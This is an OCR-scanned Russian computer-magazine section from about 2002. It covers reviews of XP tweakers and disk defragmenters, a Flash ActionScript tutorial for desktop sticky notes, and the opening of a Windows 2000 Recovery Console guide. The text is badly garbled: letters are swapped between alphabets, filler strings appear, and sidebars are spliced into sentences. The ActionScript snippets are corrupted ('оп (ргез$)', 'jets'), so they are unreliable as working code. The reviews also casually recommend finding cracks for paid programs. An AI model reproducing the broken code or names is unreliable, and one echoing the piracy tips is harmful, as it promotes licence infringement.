idle (разработчик один и тот же), да и списка 
процессов в TweakXP нет. Конечно, можно 
сделать скидку на то, что версия TweakXP сов- 
сем свежая, а вот CustomizerXP не очень (но- 
вая версия имеет статус release candidat). Так 
что сам выбирай, чем пользоваться, но я за 
TweakXP. Тем более, что для нее легче найти 
кряк :). В конце концов, конкуренция полезна 
потребителю, может разработчики чего-ни- 
будь достойное и родят. А пока что прогам раз- 
виваться и развиваться... 


ЗАЧЕМ HAM МОЗГИ? 


оооооо оо ооо оооо 


Как видишь, ситуация с твикерами 
не такая уж и плохая. Программ 
под ХР выходит все больше и 
больше, и среди них просто обяза- 
ны быть полезные фишки и наст- 
ройки. А если вспомнить, что для 
такого монстра, как X-Setup 
(www.xteq.com), постоянно выхо- 
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дят новые плагины, в TOM числе и 
с настройками под УР, то задача 
тотальной оптимизации становит- 
ся вполне по силам каждому. Прав- 
да, придется перерыть все твике- 
ры, часто из-за какой-нибудь од- 
ной уникальной функции, до кото- 
рой не дошли руки у других произ- 
водителей. Но таким маньякам, как 
мы, это вполне по силам :). Ста- 
бильной системы тебе, и не забудь 
поставить SP1! 
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НЕНАВИЖУ ЖЕСТКИЕ ДИСКИ! Они НЕУДОБНЫЕ, ИХ СТРЕМНО 
носить с совой, они шумят и ГРЕЮТСЯ И OHM ОЧЕНЬ 
МЕДЛЕННЫЕ. КОГДА ЖЕ ПОЯВИТСЯ БЫСТРЫЙ И УДОБНЫЙ 
НОСИТЕЛЬ ИНФОРМАЦИИ, КОТОРЫЙ НЕ БУДЕТ ТОРМОЗИТЬ BCH 
СИСТЕМУ? ЖЕСТКИЕ ДИСКИ УВЕЛИЧИВАЮТСЯ В ОБЪЕМЕ, НО 
НИКАК НЕ В БЫСТРОДЕЙСТВИИ. МЕЧТЫ, МЕЧТЫ... А ПРИДЕТСЯ 
ПОКА ПОТЕРПЕТЬ U ВЫЖИМАТЬ ИЗ ДИСКА ВСЕ, НА ЧТО OH 
СПОСОБЕН. ЧТО ТАМ У НАС ЕЩЕ МОЖНО СДЕЛАТЬ? ПРО Кэш 
УЖЕ РАССКАЗАЛИ, БУДЕМ МУЧИТЬ ДЕЗФРАГМЕНТАЦИЮ! 


DRIVE AHALYSE 


Лоскутное одеяло - вот самое правильное оп- 
ределение для состояния информации на дис- 
ке. Ни для кого не секрет, что данные записы- 
ваются на диск достаточно хаотично - чтобы 
запись шла быстрее. Хотя FAT и использует 
алгоритмы оптимизации, фрагментация на- 
капливается быстро и катастрофически влия- 
ет на производительность. В NTFS все лучше, 
HO только пока на диске достаточно свободно- 
го места. При заполнении диска более чем на 
80% фрагментация начинает расти с очень 
большой скоростью. Мало того, большая часть 
программ, в том числе и стандартный дефраг- 
ментатор виндов, не умеет нормально рабо- 
тать с МТЕ$-разделами: всему виной API деф- 
рагментации от Microsoft. Тем более, что стан- 
дартная прога работает очень медленно, так 
зачем же вообще ее использовать? К сожале- 
нию, программ этого класса совсем немного, 
хотя есть и стоящие. За эталон возьмем, по- 
жалуй, Norton Speed Disk - самый известный 
дефрагментатор, кстати, долгое время быв- 
ший единственным, кто умел нормально рабо- 
тать с NTFS. Прога должна работать доста- 
точно быстро, иметь настройки использования 
ресурсов и средства автоматизации. И еще - 
тестировать дефрагментаторы в равных усло- 
виях очень сложно: где я найду столько дис- 
ков :), так что далее изложены мои субъектив- 
ные впечатления за несколько месяцев рабо- 
ты. Если не согласен с результатами - попро- 
буй доказать обратное, мы открыты для кри- 
тики :). Ну, поехали что ли... 


PRESS ЯНУ KEY TO START 


Первой прогой в обзоре должен был идти 
Diskeeper от Execsoft (www.exectsoft.com). На 
сайте долго рекламировались его непревзой- 
денные возможности, даже работа по техно- 
логии клиент-сервер (не пойму, зачем это и 
как это реализовано) (это для админов, чтоб 
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дефрагментировать диски всех машин в сети, 
не отрывая зада от любимого кресла; а рабо- 
тает очень просто: установил на всех тачках 
серверные части проги, а с помощью клиент- 
ской части, установленной на админский комп, 
удаленно управляешь тулзой-дефрагментато- 


AOCKYTHOE ОДЕЯЛО - ВОТ САМОЕ 


ПРАВИЛЬНОЕ ОПРЕДЕЛЕНИЕ ДЛЯ 


ром - прим. ред.). Но... честно выкачав 20 с 
лишним мегов, я не смог установить програм- 
му. Так что оставляю это тебе, амиго, только 
учти, что у тебя должен стоять ММС (на 
2000\ХР он есть по умолчанию, остальные ка- 
чают с www.microsoft.com). Hy а мы с неприят- 
ным осадком перейдем к O&O Defrag 
Professional Edition (www.oo-software.com). Как 
тебе название, a :). По рекламе прога очень 
похожа Ha Diskeeper: опять ММС, работа в се- 
ти, замена стандартной программы и работа 
из командной строки. Посмотрим, что она мо- 
жет на самом деле. Налицо достаточно бога- 
тые настройки: тут и отжираемые для процес- 


са ресурсы, проверка диска, включение и ис- 
ключение файлов и директорий из дефраг- 
ментации, автоматическая дефрагментация. 
Очень интересно выглядит опция «Boot-time 
defragmentation». Дело в том, что к некоторым 
файлам (своп, МЕТ-зона, реестр и журналь- 
ные файлы) нельзя получить доступ во время 
работы. При выборе этой опции они будут де- 
фрагментироваться при загрузке компа. Мало 
того, сюда можно включить любой файл (луч- 
ше, конечно, достаточно большой). Так, разра- 
ботчики советуют включать сюда базы дан- 
ных - весьма мудрое решение, по-моему. В 
программе заданы несколько режимов деф- 
рагментации: «stealth» - не очень эффектив- 
ный, зато потребляющий мало ресурсов; 
«брасе» - достаточно эффективный, но только 
при наличии достаточного свободного места 
на диске; «COMPLETE/Access» - медленный, 
но эффективный, файлы сортируются по вре- 
мени последнего доступа; «COMPLETE/Date> - 
то же самое, только файлы сортируются по 
времени последней модификации; «СОМ- 
РЕЕТЕ/Мате» - то же самое, хорошо для сис- 
темных дисков. Не обошлось и без планиров- 
щика задач, достаточно мощного и удобного. 
Ну, запустим что ли... Первое впечатление - 
медленно. Непростительно медленно. Особен- 
но добивает анализ диска. Нет, это, конечно, 
лучше, чем встроенный дефрагментатор, но 
до нашего эталона проге далеко. Итак, оцени- 
ваем: по скорости работы прога уступает эта- 
лону, по функциональности слегка превосхо- 
дит. Но с учетом, что продукт коммерческий, - 
могло бы быть и лучше. В результате - Norton 
Speed Disk лучше, чем О&О, да и найти его 
проще (Горбушка рулез форева :)). 


Ну, что у нас дальше... Как-то раз, читая 
NoName (www.nnm.ru, обязательно зайди, если 
не был), я наткнулся на описание какого-то де- 
фрагментатора, работающего nog ХР и win2k, с 
соответствующим названием - VoptXP. Быст- 
ренько слив ее себе, я обнаружил, что моя кол- 
лекция софта пополнилась замечательной про- 
граммой. Чем она меня покорила? Ну, давай 
быстренько беги на www.goldenbow.com и ка- 
чай 3 мега удовольствия :). Интерфейс, конеч- 
но, невзрачный, но не суди по первому взгляду. 
Залезем в опции aka preferences. На первом ме- 
сте идет batch defrag - отмечаешь диски для оп- 
тимизации, ставишь галочку на «shutdown after 
defrag», дальше лезем в меню «file > clean 


restart», там ставим галочку Ha «Batch defrag» и 
идем спать :). Винда перезагрузится без лиш- 
них прог и запустит дефрагментацию, а после 
выключится. Правда удобно? Хотя спать идти 
не обязательно: программа работает быстрее, 
чем наш эталон. В это сложно поверить, но это 
действительно так. Тем более, что прога пре- 
красно умеет работать с NTFS, умеет справ- 
ляться со специфическими проблемами фраг- 


В РЕЗУЛЬТАТЕ - NORTON SPEED DISK 
ЛУЧШЕ, ЧЕМ O&O, ДА И НАЙТИ ЕГО 
ПРОЩЕ (ГОРБУШКА РУЛЕЗ POPEBA :)). 


КОРОЧЕ, Ты ПОНЯЛ, БЕГОМ ИДИ, КАЧАЙ 


VoOPTXP (БЛАГО ЛЕКАРСТВО К НЕЙ 
НАЙТИ НЕСЛОЖНО) И НАСЛАЖДАЙСЯ... 


ОРС но Ша 
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«M&M's, тьфу, то есть 0&0 :)» 


BORN TO DEFRAG 


ментации МЕТ («tools > tuneup >MFT»), умеет 
сжимать диски после фрагментации (только 
ХР, «preferences > defragment»), умеет исклю- 
чать и включать файлы по пути и по размеру 
(там же), оптимизировать файл подкачки 
(«tools > virtual memory»), проверять диск на 
ошибки («tools > error checking»). Кроме того, у 
проги есть полезные, хотя и не очень нужные 
функции, как то: список процессов и открытых 
окон, подключения по сети и открытые порты, 
скорость передачи инфы на диске и состояние 
памяти (все в меню «Status»). Ну и уж совсем 
непонятно, как в программе очутились: поиск 
файлов, чистилка диска, кое-какие настройки 
системы и Интернета, ссылки на утилиты вин- 
дов (все в меню «tools»). Нет, я не спорю, это 
удобно, но зачем? Зачем впихивать в програм- 


NTFS volume = 5,00GB 

Free space = 2.05GB 

Files = 25523, Folders = 2141 
Fragmented files = 33 
Recycle bin = 8.26MB 
System restore = 23.6MB 
Temp files = 5,22MB 


НЕРАРЕРЕНЕНЕНН 
it 


му лишние функции? Как начнешь думать, что 
если бы программисты потратили время не на 
эти фишки, а на убыстрение дефрагментации, 
например, то получился бы просто реактивный 
дефрагментатор :). А так - просто самый быст- 
рый из всех мне известных. Что еще можно 
сказать? Вот оптимизация файла подкачки в 
2к\ХР работает достаточно хреново: винды не 
позволяют к нему обращаться во время рабо- 
ты, приходится пару раз ребутаться. Да и ки- 
нуть своп в начало диска тоже не получится, но 
это уже вина виндов, a He VoptXP. Ну, еще мож- 
но придраться к простенькому менеджеру за- 
даний aka shedule, хотя лично я им редко поль- 
зуюсь, но вообще-то это недоработка. Блин, к 
чему бы еще придраться :). Короче, ты понял, 
бегом иди, качай VoptXp (благо лекарство к ней 
найти несложно) и наслаждайся... 


FRAGLIMIT 


VoptXp - программа, которую должен 
иметь каждый продвинутый пользователь. 
Просто удивительно, как шароварка смог- 
ла наголову побить маститых коммерчес- 
ких конкурентов. Старичок Speed disk, ты 
нам хорошо послужил, можешь отправ- 
ляться на покой. Symantec, не хотите Ha- 
нять этих программеров? :). Ну a мы Ha се- 
годня, пожалуй, закончим, а то мой бед- 
ный (хорошо, что не Байный :)) хард деф- 
рагментировали и забивали заново за се- 
годня уже раз 7, уже светает потихоньку 
:). Пойду спать что ли, а во сне мне будет 
сниться супер-быстрый винт :). Удачи! 


= 
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STICKERS 


рис. Анатолий Бердюгин 
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ВСПОМНИ, ПАРЕНЬ, НАЗЫВАЛ ЛИ ТЫ КОГО-НИБУДЬ ИЗ СВОИХ 
ЗНАКОМЫХ «VASYA_PUPKIN@MAIL.RU» ИЛИ 
«“MARIA'7589 1@GALA.NET»? А ТЕБЯ TAK НАЗЫВАЛИ? 


СОМНЕВАЮСЬ. 


НЕ ХОЧЕШЬ ЛИ В НАШЕМ PAEWEBCKOM MEHH) 


мыльников COEAATb ССЫЛКИ В ВИДЕ ОДНИХ НИКОВ (ИМЕН, 
ГАБАРИТОВ, СЕРИЙНЫХ НОМЕРОВ - НУЖНОЕ ПОДЧЕРКНУТЬ :))? 
ХОЧЕШЬ, HO НЕ ЗНАЕШЬ - КАК? ТОГДА СЛУШАЙ СЮДА. 


ANQEATHM МЕНЮ 


ооооооо ооо ооооо 


В файлик «mail.txt», где лежат мыла, тем же 
макаром, что и сами E-mail адреса, добавляй 
соответствующие им ники, записав их в пере- 
менные «nick1», «nick2» и т.д. Только не пе- 
репутай! Нику в переменной «nick742» дол- 
жен соответствовать именно мыльник 
«text742», иначе в очередном письме ты рас- 
скажешь о своих эксгибиционистских наклон- 
ностях своему боссу на рабочий E-mail. Хотя 
тебе (извращенцу - экстремалу), я думаю, это 
было бы только в кайф :). 

Во флешке делай следующее. Зайди в редак- 
тирование клипа «С - Mailer» и в скриптах для 
четвертого кадра (это именно там, где вер- 
стается меню) строчку 


this[«list»+i].text=this[«text»+i]; 
замени Ha 


this[«list»+i].text=this[«nick»+#i]; 
this[«list»+i].mail=this[«text»+i]; 


Переменная «mail» клипа «list»+i создастся 
автоматически, и в нее мы сохраняем мыло 
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чела. На кнопки выводится то, что ты напи- 
сал в текстовике в качестве ников. 

Теперь в клипушнике «С - List» в скрипте для 
кнопки исправь переменную «text» на «тай». 
Вот и все. Ctrl+Enter. 


КПЕН 


оофооо ооо ооо ооо 


Как поживает твоя хацкерская память? Ты 
помнишь все тэги, операторы и пароли, кото- 
рые хоть раз в жизни попадались тебе на гла- 
за. Но регулярно забываешь похавать, выгу- 
лять любимого попугайчика по кличке «F1» и 
хотя бы на пять минут в сутки освободить те- 
лефон, дабы напрячь опорно-двигательную 
систему, вручную (!!!) набрать чей-нибудь но- 
мер, читая при этом любимый журнальчик :). 
Специально для таких (ну, в принципе, и для 
других тоже) клинических случаев было со- 
здано великое множество лекарств - всяких 
разных прог, время от времени или постоян- 
но говорящих тебе о своем проживании на 


ACTIONSCRIPT - ЯЗЫК, ПОСТРОЕННЫЙ 
НА ПРИНЦИПАХ ОБЪЕКТНО- 
ОРИЕНТИРОВАННОГО 
ПРОГРАММИРОВАНИЯ. ЭТО МНОГО ЧЕГО 
ДАЕТ. НАПРИМЕР, ДОКОПАТЬСЯ 

ДО КАКОГО-ТО КЛИПА ИЛИ ЕГО 
ПЕРЕМЕННОЙ МОЖНО, УКАЗАВ ПОЛНЫЙ 
ПУТЬ К НЕМУ (MAM НЕЙ). НЕМНОГО 
ПРИМЕРОВ ТЫ ИМЕЕШЬ СЧАСТЬЕ 
НАБЛНОДАТЬ В ТЕКСТЕ НАШИХ 


СЦЕНАРИЕВ. 


компе, чтобы о чем-то напомнить. И да созда- 
дим мы во Flash’e стикеры, чтобы опосля ты 
узрел их на своем мониторе и вспомнил то, 
чего ты даже и не знал! Если ты только что 
из роддома, стикер (от англ. sticker - наклей- 
ка) - это, скажем так, наклейка :), содержа- 
щая, как правило, какую-то важную инфу, ко- 
торая лепится на экране (виртуально, разу- 
меется) и висит там, предоставляя тебе лег- 
кий доступ к своему контенту. Короче говоря, 
это те самые разноцветные бумажки, кото- 
рые все так любят лепить на свои мониторы, 
только виртуальные. 

Первым делом создавай флешку таких раз- 
меров, чтобы она заняла на экране все остав- 
шееся после меню место (у меня 524Х768). 
На главной (т.е. у основной Сцены) времен- 
ной шкале сделай два слоя: верхний, как все- 
гда, для ActionScript; нижний - для всего ос- 
тального. В первый вводи: 


var i=0; 
stop(); 


Если ты видишь Flash первый раз в жизни, 
объясню. Var создает новую переменную «> и 
присваивает ей начальное значение. Пере- 
менные основной сцены фактически являют- 
ся глобальными, хотя Flash - это мудрая шту- 


Мам Stleker 


- 


ка. Здесь все переменные какого-либо объек- 
та являются, типа того, его полями (беспре- 
дел :)), а т.е. при знании точного расположе- 
ния какого-либо мувика можно откуда угодно 
пользоваться его переменными. Команда 
stop() останавливает проигрывание мувика. 
Это нужно потому, что Flash склонен проиг- 
рывать по кругу бесконечно мувик с одним- 
единственным кадром, что нам здесь мешает. 


ЗПЕТЕНТЫ НПЕЯ 


Сделай новую кнопочку (Ctrl+F8) «В - 
NewSticker». Не трудно догадаться, как будет 
использована эта кнопка. Располагай ее в ни- 
жнем слое основной сцены и задавай для нее 
скрипт: 


оп (ргез$) { 


_root.i++; 


_root.st.duplicateMovieClip(«st»+_root.i, 
_root.i); 
this[«st»+_root.i]._x = 0; 
this[«st»+_root.i]._y = 0; 
} 


Это значит, что с каждым нажатием на HOBO- 
испеченную кнопочку у нас будет сделана ко- 
mus клипа «st» (о нем попозже). Эта копия бу- 
дет расположена в левом верхнем углу 
флешки на глубине _гоо[ (о глубине тоже по- 
позже). 

Теперь надо бы забацать сам стикер. Объяс- 
ню вкратце, что он будет собой представ- 
ЛЯТЬ. 

Фактически это будет маленькое окошко с 
шапкой (на которой есть кнопочка удаления 


стикера и за которую этот стикер можно тас- 
кать по экрану) и большим текстовым полем 
для ввода контента будущих воспоминаний. 
Сделай новый мувик «С - Sticker». Расположи 
его на том же слое, что и кнопочка создания 
нового стикера, только обязательно (повто- 
ряю - обязательно!) вынеси его за пределы 
Рабочей области: во время проигрывания swf- 
ки этот мувик не должен быть виден. Нарисуй 
прямоугольник для фона стикера. Учитывая 
специфику выполняемых работ, советую при- 
менять яркие, бросающиеся в глаза цвета, 
особенно для заголовка (хотя я, например, 
прекрасно различаю и полутона... :)). Выдели 
этот прямоугольник и загони его в мувик «С - 
StickerFon». В панели Копия (Instance) задай 
ему имя «fon». Ровно над прямоугольником 
растяни текстовое поле, в Параметрах текста 
для которого укажи: тип - Input Text, multiline 


ЕСЛИ ТЫ САМЫЙ УМНЫЙ И ЗАПИХНУЛ ВЕСЬ МЕХАНИЗМ 


СТИКЕРОВ В КЛИПУШНИК «MAIN», ПОЗДРАВЛЯНЗ - ТЫ ВЫБРАЛ 


САМЫЙ ЧТО НИ НА ЕСТЬ ГЕМОРРОЙНЫЙ ПУТЬ :). 
ТАСКАТЬ ИСКУССТВЕННЫЙ КУРСОР ТОГДА ЛУЧШЕ БУДЕТ ТАКИМ 


GOTOANDPLAY(2) 


rr 


page 089 


WINformation 


(не забудь поставить галочку, чтобы текст пе- 
реносился на новую строку), имя переменной - 
«t». Это будет текстовое поле, в которое мож- 
но будет написать тучу всякой дряни, которую 
ты боишься забыть. Очевидно, что тип Input 
Text дает возможность ввода текста с клавы 
во время проигрывания $\-ки. В остальном 
этот тип - то же самое, что Dynamic Text. 
Делаем шапку стикера. Это будет кнопка «В - 
StickerHead» (вся шапка) и маленькая кнопоч- 
ка «В - StickerClose» (это будет кнопка для 
удаления стикера - такие кнопки размещают- 
ся, как правило, в правой части шапки :)). 
Размещай их над (в смысле выше... в сторону 
потолка) текстовым полем так, чтобы все это 
дело походило на выньдовское окошко. Вы- 
деляй все это и позиционируй так, чтобы 
центр Рабочей области был в левом верхнем 
углу шапки. Советую разнести все элементы 
стикера по разным слоям - размер флешки от 
этого изменится несущественно, но зато ра- 
ботать в таких условиях с набором объектов, 
превышающем два, гораздо удобнее. 


Для «В - StickerHead» вставляй скрипт: 


on (press) { 
//comments 1 
ji 
while (j<_root.i) { 
if (_name == («st»+j)) { 


_root[«st»+j].swapDepths(_root[«st»+(j+ 
1)]); 
_пате = «temp»; 


_root[«st»+(j+1)]._name = 
«st»+j; 
_name = «st»+(j+1); 


} 


jets 


//comments 2 
startDrag(«»); 


on (release, releaseOutside) { 
stopDrag(); 


В принципе, практически все - за исключени- 
ем того, что находится между комментария- 
ми, - тебе должно быть известно (при нажа- 
тии начинаем таскать мувик, при отпускании 
кнопки бросаем. Я использовал не только 
просто отпускание, но и отпускание за преде- 
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лами кнопки из-за того, что startDrag() не 
обеспечивает безукоризненного следования 
мувика за курсором: если тачка тормозит, а с 
руками у тебя вдруг ни с того ни с сего при- 
ключилась большая трясучка, клип может 
просто не поспевать за мышой). Этого хвати- 
ло бы для вполне успешного использования 
данных стикеров кому угодно, но не тебе. 
Как ты помнишь, каждая копия мувика «st» 
(именно так будет называться клип стикера) 
располагается на новой глубине (новом уров- 
не), ибо на одной глубине может распола- 
гаться лишь один клип :(. Не буду вдаваться в 
детали, короче говоря, практически это вы- 
глядит так, что каждый ВНОВЬ созданный cTu- 
кер у тебя будет над остальными. Т.е. зада- 
вая мувику глубину, ты на самом деле указы- 
ваешь его высоту. Основная сцена находится 
на нулевом уровне, именно поэтому отсчет 
глубин для новых стикеров мы ведем, начи- 
ная с единицы. Что происходит у тебя на эк- 
ране, когда ты в Виндах кликаешь по неак- 
тивному окну, наполовину скрытому другими 
окнами? Оно становится активным, самым 
верхним. 


KIN@MAIL.RU» или 


Так вот, скрипт, помещенный между коммен- 
тариями, делает с нашими стикерами прибли- 
зительно то же самое. А делает он это следу- 
ющим извращенным способом. Если ты обра- 
тил внимание, имя копии стикера состоит из 
двух частей: имени предка - «St» и номера. 
Вначале это был просто порядковый номер, 
чтобы различать имена клипов, а здесь мы 
его используем чуть-чуть по-другому. Ведь он 
совпадает с глубиной, на которой находится 
соответствующий клип. Вот здесь дали о се- 
бе знать мой воспаленный долгим компьюте- 
ризированным времяпрепровождением мозг 
и моя врожденная тяга к извращенному. Я 
сомневаюсь, что ты когда-нибудь сделаешь у 
себя на Рабочем столе настолько большое 
число стикеров, чтобы хотя бы наполовину 
приблизиться к максимально допустимому 
числу мувиков во Flash ролике. Поэтому до- 
статочно было бы просто вынести конкрет- 


иничевких влуЧАЕВ Было SUSEANO | 


ный выделяемый мувик на самую большую 
глубину (например, root.i+1). 

Я даже вначале и хотел было так и сделать. 
Но потом я все же решил, что из нас двоих не 
я самый большой извращенец - вдруг ты и 
правда после прочтения данного материала 
приступишь к активным кликам в области Ра- 
бочего стола :). И решил слои на всякий слу- 
чай экономить. Кусок кода между коммента- 
риями переносит текущий (т.е. тот, на шапке 
которого кликнули) клип на самый верхний 
уровень (_root.i), оставляя при этом порядок 
остальных клипов неизменным. 

Для кнопки «В - StickerClose» вводи: 


on (press) { 
this.removeMovieClip() 


~ 


Думаю, это тебе знакомо. Удаляется клип, в 
котором вызван скрипт, т.е. текущий стикер. 
Здесь можно было бы тоже сэкономить на 
слоях и отсортировать стикеры по глубинам 
так, чтобы усе было чики-пики, т.е. рацио- 
нально. Попробуй сделать это самостоятель- 
но и (если получится :)) пришли мне. 


Копию клипа «С - Sticker» на Рабочей облас- 
ти основной сцены обзови, как было услов- 
ленно, «St» и вынеси за ее границу. 


ЕРАСЫВЫЙ ВПЕН 


оооооо ооо фоо ооо 


Давай сделаем так, чтобы этот наш стикер, 
после того как он провисит без дел (ну, т.е. 
ты на него не обращаешь внимания, даже не 
дотрагиваешься до него) минут пять, начинал 
истерически мигать. (Мне этого вполне хва- 
тило. Вообще у тебя и у самого не плохой 
проц на плечах интегрирован - придумай, чем 
может стикер на Рабочем столе лучше всего 


привлечь твое внимание, и, если сам не смо- 
жешь сделать, - пиши.) 


Вернись в редактирование скриптов для 
кнопки «В - StickerHead» и добавь туда перед 
startDrag(«») фишку: 


_alpha=100; 

fon._alpha=0; 

gotoAndPlay(1). 

Далее могу тебе предложить два пути разви- 
тия мувика «С - Sticker»: сделать проверку ус- 
ловия неактивного выжидания стикера в за- 
цикленных кадрах (так, как делали располза- 
ние фона для меню в прошлой swf-ke) или 
просто растянуть первый кадр на N кадров 
(из расчета, сколько именно секунд мувик 
должен просто висеть). Я искренне надеюсь, 
что ты такой же, как и я, сторонник безраз- 
мерного увеличения геморройности любого 
начинания, а посему выберешь работу с 
ActionScript в зацикленных кадрах :). Именно 
это я сейчас и буду описывать, ибо второй 
способ я тебе уже описал (подробнее о нем и 
не расскажешь :)), да к TOMY же лично мне он 
конкретно не нравится (неприятно так сильно 
временную шкалу прокручивать :) - а крутить 
при скорости двенадцать кадров в секунду 
надо будет не один метр). 

Итак, создавай для скриптов новый слой в 
мувике стикера. Расположи его, как обычно, 
самым верхним. В первом кадре обнулим пе- 
ременную счетчика времени: 


time=0; 
Во втором пиши: 


time++; 
if (time>7200) { 


// из расчета, что у тебя стоит ско- 
рость 12 кадров в секунду, это будет 10 
минут 

gotoAndPlay(4); 

В третьем: 
gotoAndPlay(2); 
В четвертом и шестом: 


_alpha=0; 


В пятом: 


_alpha=100; 
fon._alpha=0; 


В седьмом: 
gotoAndPlay(4); 


Разъясняю. Появляется стикер, счетчик вре- 
мени обнуляется, после чего проигрывание му- 
вика зацикливается на втором-третьем кадрах 
до тех пор, пока счетчик не насчитает десять 
минут. По истечении этого срока клип перехо- 
дит ко второму циклу - с четвертого по седьмой 
кадр, в котором усиленно мигает (мы просто 
уменьшаем и увеличиваем прозрачность клипа 
и его компонента), пытаясь привлечь твое вни- 
мание. Когда ты жмешь на заголовок стикера, 
он становится непрозрачным и возвращается к 
нулевому состоянию счетчика. Замечу, что при 
таком раскладе стикер вернется после мига- 
ния в нормальное состояние лишь только при 
клике по его шапке, т.е. хоть ты ори благим 
французским матом и трясись от напряжения, 
усердно кликая на текстовом поле, он не пре- 


кратит свои планомерно ведущие в объятия 
Кащенко мерцания :). Го же касается и выноса 
стикера на передний план. 


сотен 


Используя  воз- 

можности флешевского объекта Date 

и импортируя в свою флешку звуки (об этом 

попозже, в следующих номерах), можно сде- 

лать продукт ни в чем не уступающим всем 

известным прогам-будильникам, коих сейчас 

развелось туева хонна, а по своей красоте (и 
удобству) даже превосходящим. 


Hy что ж, вот теперь у тебя уж точно 
самый информативный Рабочий стол 
i Далее будем его украшать. 

да пребудет с тобой Великий 
Flash! 


|= 
ыы 
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WINFormation 


Андрей «Дронич» Михайлюк (dronich@real.xakep.ru) 


ПОДНИМАЕТ Нан 


Что БЫ ТАМ НИ ГОВОРИЛИ ПРО ПОВЫШЕННУЮ НАДЕЖНОСТЬ 
ВИНТУКЕЯ, А OH ВСЕ РАВНО ВРЕМЯ ОТ ВРЕМЕНИ НОРОВИТ СВА- 
ЛИТЬСЯ С КОПЫТ. Я СОГЛАСЕН, ЧТО УРОНИТЬ ЕГО ФАТАЛЬНО 
(TAK, ЧТОБЫ БОЛЬШЕ НЕ ЗАГРУЗИТЬ :)) СТАЛО ГОРАЗДО СЛОЖ- 
НЕЕ. ДЛЯ СПРАВКИ: НА МОЕЙ ПАМЯТИ БОЛЬШЕ ДЕСЯТКА УБИ- 
тых 95-ых, ЧЕТЫРЕ Э8-ых и ВСЕГО ОДНИ 2000-ыЕ (ДА и ТО 
НА КОМПЕ НОА 7)). ОДНАКО ТЕНДЕНЦИЯ. 


Тенденция тенденцией, а к такой внештатной 
ситуации, как падение виндов (господи, неуже- 
ли я лет пять назад мог назвать это «внештат- 
ной ситуацией»? - прим. меня), надо готовить- 
ся заранее. Ведь поломанный w2k не восстано- 
вишь с простой досовской дискетки, а моя 
фирменная бутявка (см. спец по софту) позво- 
лит только прочитать и скопировать нужные 
данные с МТЕ$-раздела. Для полноценного же 
воскрешения потребуется нечто большее. 


ПОДАРНЫ ОТ BHANH 


фо ооо оооое 
Итак, лишив нас полноценного доступа к фай- 
лам системы из-под ДОСа, дядюшка ГейЦ 
предложил всем без исключения юзерам сра- 
зу переустанавливать систему и не геморро- 
иться. Если тебя устраивает такой банальный 
исход дела - можешь просто перевернуть 
страницу. Любителям же подзаморочиться 
сообщу, что взамен командной строки ДОСа 
продвинутые «подоконники» получили так на- 
зываемую ERC aka Emergency Recovery 
Console. Конечно, это не дискета с волковым 


и дискдоктором, HO все же... Запустив эту 


Aide emer: Цар неее 
= 


ы 
——— 


092 


поуетбег/ 11/2002 


ПРИ СОЗДАНИИ ЗАГРУЗОЧНОГО СИДНОКА 
в NERO НАДО БЫТЬ ОСОБО АККУРАТНЫМ 
(САМ ОБЖЕГСЯ ОДИН РАЗ). ДЕЛО В ТОМ, 
что OH ЗАПИСЫВАЕТ НА БОЛВАНКУ ISO 
ПО СВОИМ СТРАННЫМ ПРАВИЛАМ 
(ВЕРНЕЕ, ДОБАВЛЯЕТ ЕГО ВЕРСИНО), 


поэтому нАДО ЛИБО СКАРМЛИВАТЬ ЕМУ 


СПЕЦИАЛЬНЫЙ ВООТ-СЕКТОР, ЛИБО 
BKAHOYATb ОПЦИНЫ DON’T ADD THE <;1» 


150 FILE VERSION EXTENSION (В СТАРЫХ 


ВЕРСИЯХ ЭТОЙ ОПЦИИ HET, ПОЭТОМУ 
ЛЕЗЕМ В РЕЕСТР И ПРАВИМ ПАРАМЕТР 
НКСО\БОЕТМ/АРЕХАНЕАС\МЕРО - BURNING 
ROM\GENERAL\ADDISOFILEVERSION НА 


нолию). 


консольку (как это сделать, я расскажу попоз- 
же), ты сможешь без зазрения совести юзать 
вот такие незамысловатые команды: 

Batch - запуск батника (batch a.bat) 

Expand - распаковка саб-файла 

Logon - вход в полноценную систему 

Моге (Туре) - чтение текстовиков 

Systemroot - переход в корневой каталог 

Set - установка переменных окружения 
1$15\с - список драйверов/служб 

Disable - отключение драйвера или службы 
Enable - включение драйвера или службы 
Chkdsk - проверка диска 

Diskpart - разборки с разделами харда 

Мар - список назначенных дискам букв 
Fixboot - восстановление ВООТ-сектора 
Fixmbr - восстановление Master Boot Record 
Format - если ничего не помогло :( 

Exit - ну а сам-то как думаешь? :) 
Разумеется, большинство стандартных кон- 
сольных команд тоже не теряет своей силы - 
копировать, удалять и гулять по каталогам 
ты сможешь без проблем (весь список ко- 
манд можно получить, набрав «Пер» из кон- 
соли восстановления). 


POE ЗНМУЮТ РАНИ 


оооооо ооо ооо оо 


Microsoft не был бы Microsoft’om, если бы пункт 
«Консоль восстановления» присутствовал в 
списке вариантов загрузки виндов. Нету его 
там, равно как нет и пимпы «Перезагрузиться 
в консоль», и ярлычка «Консоль» на рабочем 
столе :). Так что все последующие действия 
по добыче ЕВС прошу считать чистой воды 
шаманством для особо продвинутых :). 


ПУНКТ ПЕРВЫН. ПОНАЙПЬНЫН 


ооооооо оо оо ооо 


Легким движением руки запускаем на выпол- 
нение команду «winnt32.exe /cmdcons» из ка- 
талога 1386. В итоге получаем дополнитель- 
ную запись в списке осей для загрузки - «Кон- 
соль восстановления Microsoft Windows 2000» 
:). Рекомендуется злостным параноикам и 
любителям насилия над системой. 


По умолчанию загрузившись 

с аварийного компакта или 
флопаря, ты сможешь изменять 
файлы только в каталоге винды 
(т.е. WINNT). Чтобы избежать 
такой несправедливости и 
юзать диск на полную, придется 
пошаманить: запускай аплетину 
Панель Управления — 
Администрирование — 
Локальная политика 
безопасности. В дереве политик 
выбираешь Локальные 
политики — Параметры 
безопасности. Теперь в правой 
части ищи опцию «Консоль 
восстановления: разрешить 
копирование дискет и доступ 

ко всем дискам и папкам» 

и включай ее. Осталось только 
установить локальную 
переменную окружения 
AllowAllPaths на «True» 
(делается это в консоли 
восстановления командой «set 
AllowAllPaths=true»). 


Кстати о птицах - если вдруг захочется изба- 
BUTbCA OT этой модной операционки, придется 
затирать каталоги «cmdcons» и «cmidr» из корня, 
а также тереть инфу о консоли из boot.ini. Что 
инсталл, что анинсталл - все через задницу :(. 


ПУНКТ BTOPOH. ЦЕДЕРОТНЫН 


Предназначен для владельцев лицензионных 
дисков с виндами (на крайняк их качественных 
копий) или обладателей жгучих дисководов и 
прямых рук. В первом случае достаточно подгру- 
